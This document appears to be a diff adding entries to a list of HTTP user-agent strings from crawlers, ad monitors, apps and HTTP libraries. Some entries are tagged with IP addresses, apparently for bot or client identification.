    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602280463-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602280466-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1602204413-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602209368-0
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1602217570-0
    +WhatsApp/2.20.202.4 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602203244-0
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1602216929-0
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/85.0.4183.140 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (Windows; rv:81.0) Gecko/20100101 Firefox/81.0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 PTST/201008.201034
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602203244-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602203243-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602203245-10
    +okhttp/4.9.0
    +AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
    +WordPress/5.5.1; https://www.comparitech.com
    +WordPress/5.4.2; https://www.easyprintersupport.com
    +URL_Access/2.1 (Macintosh; PPC)
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1602356744-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1602291050-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602300406-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602312471-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602334681-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 6.0; SM-G600FY ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) smp.prod---sieve.hlfs-rest_client/1602333744-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1602322236-0
    +Java/14
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602389672-10
    +WhatsApp/2.20.202.5 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602412488-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602412490-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602417942-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602422003-0
    +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.2h zlib/1.2.3 libidn/1.18 libssh2/1.4.2
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 8.1.0; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 YaBrowser/20.8.3.115 Yowser/2.5 Safari/537.36
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 7.1.2; AS-5433_Secret ) U2/1.0.0 Mobile
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.0.2; SM-N900 ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602486086-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602486083-10
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602490518-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602509178-0
    +WordPress/5.5.1; https://www.mergerscorp.com
    +WordPress/5.5.1; https://www.mergerscorp.com/de/
    +WordPress/5.5.1; https://www.mergerscorp.com/zh-hans/
    +WordPress/5.5.1; https://www.mergerscorp.com/ru/
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1.1; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile
    +Gozilla/5.0 (X11; Darwin Pig Version ^('oo')^ x86_64; rv:44.0) Gecko/20100101 Netsurf/44.0 Iceweasel/44.0
    +Gozilla/5.0 (X11; Darwin Pig Version ^('oo')^ on x86_64; rv:44.0) Gecko/20100101 Netsurf/44.0 Iceweasel/44.0
    +Apache-HttpClient/4.5.1 (Java/1.8.0_252)
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) smp.prod---sieve.hlfs-rest_client/1602534221-0
    +WordPress/5.4.2; https://flajm.se
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602583464-0
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.51
    +WhatsApp/2.20.202.6 A
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1.2; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602598421-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602598423-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602560939-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602560930-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602560928-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602561456-0
    +WhatsApp/2.20.201.17 A
    +WhatsApp/2.20.201.19 A
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201012.191046
    +WordPress/5.5.1; https://iniciarbr.net
    +WordPress.com; http://iniciarbr.net
    +WordPress.com; https://iniciarbr.net
    +WhatsApp/2.20.202.7 A
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201013.191026
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 PTST/201012.191046
    +bl.uk_lddc_bot/3.4.0-20200518 (+http://www.bl.uk/aboutus/legaldeposit/websites/websites/faqswebmaster/index.html)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 PTST/201013.191026
    +WhatsApp/2.20.110.30 i
    +WhatsApp/2.20.195.18 A
    +Apache-HttpClient/4.5.10 (Java/1.8.0_212)
    +curl/7.36.0
    +okhttp/3.12.8
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.222]
    +okhttp/4.2.1
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +WordPress/5.4.2; https://peritossolutions.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602645380-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602707871-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1602635497-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602639694-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602650064-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602650062-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602655492-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602656025-0
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.255.231.39]
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1602660058-0
    +WhatsApp/2.20.202.8 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1602635644-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602641362-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602644379-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 PTST/201014.151018
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201014.151018
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602641362-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602644379-60
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602644378-0
    +yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_241; Europe/fr) http://yacy.net/bot.html
    +WordPress/5.3.4; https://www.instanslogin.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602641363-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602644379-10
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1602698902-10
    +AvsDeviceSdk/1.11.0
    +WordPress/5.5.1; https://www.routech.ro
    +okhttp/3.12.5 [ip:83.99.88.29]
    +curl/7.36.0 [ip:213.32.4.224]
    +Python-urllib/3.5 [ip:213.32.4.102]
    +Python-urllib/3.5 [ip:213.32.4.115]
    +Python-urllib/3.5 [ip:213.32.4.247]
    +Python-urllib/3.5 [ip:213.32.4.211]
    +Python-urllib/3.5 [ip:213.32.4.245]
    +Python-urllib/3.5 [ip:213.32.4.95]
    +curl/7.64.1 [ip:213.32.4.247]
    +curl/7.64.1 [ip:213.32.4.245]
    +curl/7.64.1 [ip:17.58.62.4]
    +Python-urllib/3.5 [ip:213.32.4.81]
    +Python-urllib/3.5 [ip:213.32.4.224]
    +okhttp/3.12.5 [ip:213.32.4.115]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:213.32.4.224]
    +okhttp/3.12.5 [ip:213.32.4.211]
    +curl/7.64.1 [ip:17.58.57.4]
    +curl/7.64.1 [ip:213.32.4.102]
    +curl/7.64.1 [ip:213.32.4.211]
    +okhttp/3.2.0 [ip:213.32.4.102]
    +curl/7.64.1 [ip:213.32.4.81]
    +okhttp/3.2.0 [ip:213.32.4.245]
    +curl/7.64.1 [ip:17.58.62.5]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:213.32.4.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:213.32.4.245]
    +okhttp/3.2.0 [ip:213.32.4.115]
    +curl/7.36.0 [ip:185.199.25.199]
    +okhttp/3.12.5 [ip:213.32.4.224]
    +okhttp/3.12.5 [ip:213.32.4.102]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.106]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:40.77.167.254]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.255.231.36]
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:213.180.203.22]
    +okhttp/3.12.5 [ip:213.32.4.81]
    +curl/7.36.0 [ip:213.32.4.81]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:72.14.199.120]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:213.32.4.81]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.203]
    +okhttp/3.12.5 [ip:213.32.4.95]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:72.14.199.122]
    +okhttp/3.12.10
    +okhttp/3.12.5 [ip:80.214.79.123]
    +okhttp/3.12.5 [ip:213.32.4.247]
    +okhttp/3.12.5 [ip:82.224.23.224]
    +okhttp/3.12.5 [ip:80.214.71.174]
    +curl/7.64.1 [ip:213.32.4.115]
    +okhttp/3.12.5 [ip:82.113.98.2]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:213.32.4.102]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.110]
    +curl/7.64.1 [ip:213.32.4.95]
    +curl/7.64.1 [ip:17.58.62.21]
    +okhttp/3.12.5 [ip:93.110.50.117]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:213.32.4.247]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.57]
    +okhttp/3.2.0 [ip:213.32.4.95]
    +okhttp/3.12.5 [ip:213.32.4.245]
    +curl/7.64.1 [ip:213.32.4.224]
    +okhttp/3.10.0 [ip:79.47.78.28]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.79.26]
    +python-requests/2.21.0 [ip:213.32.4.102]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.30]
    +curl/7.36.0 [ip:213.32.4.245]
    +okhttp/3.2.0 [ip:213.32.4.224]
    +WordPress/5.3.4; http://www.swung0x48.com
    +WhatsApp/2.20.201.21 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602780767-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602803366-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602803368-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1602721390-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602732768-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 7.1.2; SM-N910H ) U2/1.0.0 Mobile
    +WhatsApp/2.20.200.16 A
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602773527-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602779205-0
    +WhatsApp/2.20.199.13 A
    +WordPress/5.5.1; https://sdelaicomp.ru
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36 PTST/190509.230546 PTST/201014.151018
    +Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/85.0.4183.140 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1602745555-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.demand/1602745554-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) smp.prod---sieve.hlfs-rest_client/1602782879-0
    +WordPress/4.7.5; http://www.omgholysmoke.com
    +RyteBot/1.0.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 (+https://bot.ryte.com/)
    +okhttp/3.12.5 [ip:80.215.75.246]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.79.24]
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/201014.151018 [ip:34.106.70.7]
    +okhttp/3.11.0 [ip:93.45.88.96]
    +curl/7.36.0 [ip:213.32.4.211]
    +okhttp/3.11.0 [ip:37.160.236.147]
    +okhttp/3.2.0 [ip:213.32.4.247]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:213.32.4.102]
    +okhttp/3.9.0 [ip:213.32.4.115]
    +curl/7.64.1 [ip:17.58.57.103]
    +curl/7.64.1 [ip:17.58.57.101]
    +curl/7.64.1 [ip:17.58.57.20]
    +curl/7.36.0 [ip:213.32.4.115]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.79.28]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:72.14.199.122]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:213.32.4.247]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:213.32.4.211]
    +okhttp/3.12.5 [ip:80.215.6.13]
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.247]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.102]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.123]
    +okhttp/3.11.0 [ip:213.32.4.95]
    +curl/7.64.1 [ip:17.58.57.21]
    +curl/7.64.1 [ip:17.58.62.20]
    +okhttp/3.2.0 [ip:213.32.4.81]
    +AdsBot-Google (+http://www.google.com/adsbot.html) [ip:213.32.4.95]
    +curl/7.64.1 [ip:17.58.57.100]
    +curl/7.51.0 [ip:213.32.4.245]
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602811050-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602852162-0
    +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1127.19.1.el7.x86_64
    +WhatsApp/2.20.201.23 A
    +python-requests/2.4.3 CPython/3.4.2 Linux/4.4.6-1-pve
    +WhatsApp/2.20.200.23 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602838025-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1602809237-0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 7.1.1; SM-J701F ) U2/1.0.0 Mobile
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602837970-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602837979-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602838035-0
    +WhatsApp/2.20.202.9 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602846044-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602887049-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602887049-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1602887050-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602887048-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  yahoo.adquality.lwd.desktop/1602887051-0
    +Snapchat/11.2.0.68 (SM-N960U; Android 10#N960USQS5ETH4#29; gzip) V/MUSHROOM
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php) [ip:213.32.4.211]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/88.0.4291.0 Safari/537.36
    +okhttp/3.11.0 [ip:213.32.4.245]
    +okhttp/3.11.0 [ip:213.32.4.211]
    +okhttp/3.9.0 [ip:213.32.4.247]
    +okhttp/3.9.0 [ip:213.32.4.102]
    +okhttp/3.12.5 [ip:93.45.91.169]
    +okhttp/3.9.0 [ip:213.32.4.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:213.32.4.115]
    +okhttp/3.2.0 [ip:213.32.4.211]
    +okhttp/3.11.0 [ip:213.32.4.247]
    +okhttp/3.11.0 [ip:213.32.4.81]
    +curl/7.51.0 [ip:213.32.4.102]
